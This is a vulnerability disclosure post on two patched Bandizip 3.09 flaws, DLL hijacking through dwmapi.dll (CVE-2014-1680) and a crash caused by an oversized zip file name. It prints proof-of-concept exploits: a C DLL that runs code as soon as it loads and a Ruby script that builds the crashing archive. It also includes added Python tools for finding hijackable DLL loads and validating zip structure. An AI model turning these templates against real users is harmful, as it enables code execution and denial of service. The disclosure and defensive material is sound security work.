All of these issues were patched in Bandizip 3.10 following responsible disclosure to the vendor.
Overview of Bandizip
Bandizip is a lightweight, fast and 100% free all-in-one zip archiver. It has a very fast zip algorithm for compression and extraction, with fast drag and drop, high-speed archiving, and multi-core compression. It handles the most popular compression formats, including Zip, 7z, Rar, and so on.
Arbitrary DLL Injection Code Execution
Bandizip 3.09 and earlier versions are affected by a DLL hijacking issue in which the application loads dwmapi.dll in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into, for example, opening a file located on a remote WebDAV or SMB share. The application can clearly be seen searching for dwmapi.dll in the current directory, which is a consequence of loading it insecurely.
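The observation above (the application probing the current directory for dwmapi.dll) is the kind of thing a defender confirms from a Process Monitor capture. The following Python script is an added example, not part of the original advisory or of Bandizip's code: it reads a Process Monitor CSV export and reports every DLL that a process looked for, and failed to find, in a directory outside the Windows system directories, because a DLL planted at any such location would be the one loaded. The CSV lines are constructed for this example (the advisory's own capture is not reproduced here), and the column names are assumed to follow Process Monitor's default CSV export.

```python
import csv
import io

# Directories owned by the Windows loader; a failed probe here is normal and not
# something an attacker can influence.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")

# Constructed sample of a Process Monitor CSV export (default export columns),
# modelled on a user opening an archive from a network share with Bandizip.
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:11.1000000 AM","Bandizip.exe","1234","CreateFile","C:\\Program Files\\Bandizip\\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1000100 AM","Bandizip.exe","1234","CreateFile","C:\\WINDOWS\\system32\\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1000200 AM","Bandizip.exe","1234","CreateFile","\\\\fileserver\\share\\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1000300 AM","Bandizip.exe","1234","CreateFile","C:\\WINDOWS\\system32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:02:11.1000400 AM","explorer.exe","880","CreateFile","C:\\Users\\alice\\Desktop\\notes.txt","SUCCESS","Desired Access: Generic Read"
'''


def classify(path):
    """Describe who could place a DLL at this path."""
    if path.startswith("\\\\"):
        return "remote share (WebDAV/SMB)"
    if path.lower().startswith(SYSTEM_DIRS):
        return "system directory"
    return "application, current or PATH directory"


def find_hijack_candidates(csv_text, process=None):
    """Return (process, dll, probed path, location) for every failed DLL probe
    outside the system directories; each is a place where a planted DLL would win."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if process and row["Process Name"].lower() != process.lower():
            continue
        path = row["Path"]
        if row["Operation"] != "CreateFile" or not path.lower().endswith(".dll"):
            continue
        if row["Result"] not in ("NAME NOT FOUND", "PATH NOT FOUND"):
            continue  # the DLL was found: a normal load, or one to verify separately
        where = classify(path)
        if where == "system directory":
            continue
        dll = path.rsplit("\\", 1)[-1].lower()
        hits.append((row["Process Name"], dll, path, where))
    return hits


def summarize(csv_text, process=None):
    """Group candidates per (process, DLL) so each hijackable name is listed once
    together with every location that was probed for it."""
    summary = {}
    for proc, dll, path, where in find_hijack_candidates(csv_text, process):
        summary.setdefault((proc, dll), []).append((path, where))
    return summary


if __name__ == "__main__":
    for (proc, dll), probes in summarize(SAMPLE_CSV).items():
        print(f"{proc}: {dll} is resolved insecurely; probed at:")
        for path, where in probes:
            print(f"    {path}  [{where}]")
```

To use it on a real capture, filter Process Monitor to the archiver's process, export the events as CSV, and pass the file contents to `summarize`. A hit in the application directory is expected for any DLL the program does not ship with and matters only where that directory is writable by others; a hit on a remote share or in the directory of the opened file is the case this advisory describes.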
Proof of Concept
```c
/*
 * Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll)
 * Date: February 5th 2014
 * Author: Osanda Malith Jayathissa
 * E-Mail: osandajayathissa<at>gmail.com
 * Version: 3.09
 * Vendor Homepage: http://www.bandisoft.com/
 * Tested on: Windows XP SP2 en
 * Vulnerable extensions: All Extensions
 * CVE: CVE-2014-1680
 */
#include <windows.h>

/* Forward declaration: DllMain calls owned() before its definition. */
void owned(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the planted DLL is mapped into the process. */
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

void owned(void)
{
    MessageBox(0, "Bandizip DLL Hijacked\nOsanda Malith", "POC", MB_OK);
}
```
Vulnerability Information
Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-1680
Advisories
[1] http://www.bandisoft.com/bandizip/history/
[2] http://secunia.com/advisories/56846/
[3] http://www.osvdb.org/show/osvdb/102979
[4] http://packetstormsecurity.com/files/cve/CVE-2014-1680
Report Timeline
2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
2014-01-25: Contacted MITRE and obtained a CVE-ID
.Zip Crash
I also found that Bandizip 3.09 and earlier versions are affected by a file format crash through which attackers can crash the application remotely.
Proof of Concept
```ruby
#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP SP2 en
=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Ensure we have a valid ZIP local file header
lf_header  = "\x50\x4B\x03\x04\x14\x00\x00"
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" # file size
lf_header += "\x00\x00\x00"

# Central directory file header
cdf_header  = "\x50\x4B\x01\x02\x14\x00\x14"
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00"
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

# End of central directory record
eofcdf_header  = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory, relative to start of archive
eofcdf_header += "\x00\x00"

# Our payload: an oversized file name
payload  = "A" * 4064
payload += ".txt"

exploit = lf_header + payload + cdf_header + payload + eofcdf_header

# Write in binary mode so no byte of the headers is translated
File.open('bandizip.zip', 'wb') { |f| f.write(exploit) }
#EOF
```
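The PoC above crashes the parser with a 4068-byte file name. As an added example that is not part of the original post, the following Python validator shows what a defender can check before handing an untrusted archive to an extractor: it walks the central directory, cross-checks every entry against the local file header it points to, and rejects file names beyond a length limit (260 bytes here, an assumption chosen for this example) or headers that disagree with each other. It builds its own inputs, all constructed: a benign archive from the standard library and hand-assembled archives laid out like the PoC's (local header, central directory, end-of-central-directory record), one of them with a local header that claims a shorter name than the central directory.

```python
import io
import struct
import zipfile

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT = "<4sHHHHHIIIHH"          # 30-byte local file header
CENTRAL_FMT = "<4sHHHHHHIIIHHHHHII"  # 46-byte central directory header
EOCD_FMT = "<4sHHHHIIH"              # 22-byte end-of-central-directory record
MAX_NAME = 260  # policy limit assumed for this example (longer than any Windows path component)


def check_zip(data, max_name=MAX_NAME):
    """Walk the central directory and cross-check each entry against its local header.
    Returns a list of findings; an empty list means the structure is consistent."""
    findings = []
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or eocd + 22 > len(data):
        return ["no end-of-central-directory record"]
    _, _, _, _, entries, cd_size, cd_offset, _ = struct.unpack_from(EOCD_FMT, data, eocd)
    if cd_offset + cd_size > eocd:
        findings.append(f"central directory ({cd_offset}+{cd_size}) overlaps the EOCD record at {eocd}")
    pos = cd_offset
    for n in range(entries):
        if pos + 46 > len(data) or data[pos:pos + 4] != CENTRAL_SIG:
            findings.append(f"entry {n}: no central directory header at offset {pos}")
            break
        c = struct.unpack_from(CENTRAL_FMT, data, pos)
        fn_len, extra_len, comment_len, local_off = c[10], c[11], c[12], c[16]
        name = data[pos + 46:pos + 46 + fn_len]
        if len(name) != fn_len:
            findings.append(f"entry {n}: central filename truncated ({len(name)} of {fn_len} bytes)")
        if fn_len > max_name:
            findings.append(f"entry {n}: filename length {fn_len} exceeds limit {max_name}")
        if local_off + 30 > len(data) or data[local_off:local_off + 4] != LOCAL_SIG:
            findings.append(f"entry {n}: offset {local_off} does not point at a local header")
        else:
            lfn_len = struct.unpack_from(LOCAL_FMT, data, local_off)[9]
            if lfn_len != fn_len:
                findings.append(f"entry {n}: local filename length {lfn_len} != central {fn_len}")
            elif data[local_off + 30:local_off + 30 + lfn_len] != name:
                findings.append(f"entry {n}: local and central filenames differ")
        pos += 46 + fn_len + extra_len + comment_len
    return findings


def build_benign():
    """A well-formed one-entry archive produced by the standard library (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("hello.txt", "hello")
    return buf.getvalue()


def build_long_name(name_len=4068, tamper_local=False):
    """A hand-assembled one-entry archive with a name_len-byte file name, laid out like
    the PoC (constructed). With tamper_local=True the local header claims a 15-byte
    name while the central directory keeps the full length."""
    name = b"A" * (name_len - 4) + b".txt"
    local_len = 15 if tamper_local else len(name)
    local = struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, 0, 0, 0, 0, 0, 0, local_len, 0) + name
    central = struct.pack(CENTRAL_FMT, CENTRAL_SIG, 20, 20, 0, 0, 0, 0,
                          0, 0, 0, len(name), 0, 0, 0, 1, 0x20, 0) + name
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


if __name__ == "__main__":
    samples = [("benign", build_benign()),
               ("long name", build_long_name()),
               ("tampered", build_long_name(tamper_local=True))]
    for label, blob in samples:
        print(f"{label}: {check_zip(blob) or 'ok'}")
```

Running `check_zip` before extraction turns an oversized or inconsistent name into a rejected file rather than a parser crash; the length limit should be set to whatever the downstream extractor and filesystem actually support.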
Report Timeline
2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
Acknowledgements
As a result of reporting these vulnerabilities, my name was published in the About dialog box of Bandizip 3.10. Thanks to park for adding me 🙂